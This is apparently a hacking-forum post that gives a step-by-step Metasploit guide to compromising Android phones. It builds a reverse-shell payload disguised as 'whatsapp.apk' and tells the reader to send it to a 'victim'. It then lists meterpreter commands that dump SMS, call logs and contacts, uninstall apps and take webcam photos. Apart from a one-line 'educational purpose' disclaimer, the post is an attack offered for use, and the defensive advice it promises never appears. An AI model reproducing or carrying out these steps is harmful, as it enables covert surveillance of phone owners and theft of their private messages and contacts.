• We just launched and are currently in beta. Join us as we build and grow the community.

Hack SMS, Call Logs, Whatsapp of any Android Phone

___AQ

Blockchain Wizard
A Rep
0
0
0
Rep
0
A Vouches
0
0
0
Vouches
0
Posts
44
Likes
13
Bits
1 MONTH
1 1 MONTH OF SERVICE
LEVEL 1 500 XP
nnn.png


In the india total number of android mobile users has reached 114 million. Cause of increasing the total number of andorid mobile users the cybercrime has also be incressed. Hence In this article we will discuss how to hack any android phone using metasploit framework and how to protect himself.


Declarations
:
This article is posted only for educational purpose to spread awareness among people
.

Lets begin !!

Android platforms support applications with only .apk extensions hence we will make our malicious payload in .apk format.
Follow below commands for making a payload

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 R > whatsapp.apk1msfvenom-pandroid/meterpreter/reverse_tcp lhost=192.168.0.107lport=4444R>whatsapp.apk
  • Lhost = ( according to your ip )
  • Lport = ( according to you )
  • R = Raw Format
  • P = ( platform )

1-12.png

2-7.png
msfconsole1msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 4444
exploit12345useexploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost192.168.0.107set lport4444exploit

3-6.png


Send this apk file to the victim and make sure victim run this file in andorid phone.

Screenshot_2020-04-30-15-29-22-903_com.google.android.packageinstaller-512x1024.jpg


When victim will run this apk file you can oberve meterpreter session will open.

5-10.png


BOOM ! You hacked vicitm phone.

After hacking vicitm phone we can do many thing using these commands such as call logs, camera, screenshot, whatsapp chats, sms details and much more. But we will show some major commands given below.

6-4.png


To show all features use the following command ;

help1help

7-6.png


You can gather information about OS ;

sysinfo1sysinfo

8-6.png


Check device rooted or not ;

check_root1check_root

9-6.png


You can check how many apps are installed in Victim’s phone ;

app_list1app_list

10-6.png


You can delete specific application by given this command ;

app_uninstall <packege_name>1app_uninstall<packege_name>

11-4.png


You can use these command for dump all call-logs ;

dump_calllog1dump_calllog

12-4.png


You can also dump all contact using the following command ;

dump_contacts1dump_contacts

13-6.png


You can use the following command for dump all sms ;

dump_sms1dump_sms

15-3.png


You can read the dump file by execute the following command ;

cat dump.txt1cat dump.txt

calllog.png


You can use webcam of victim for capture the picture ;

webcam_snap1webcam_snap

14-5.png
 

418,124

310,195

310,204

Top